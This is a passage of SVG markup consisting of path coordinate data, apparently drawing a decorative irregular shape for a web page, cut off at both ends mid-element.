.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path 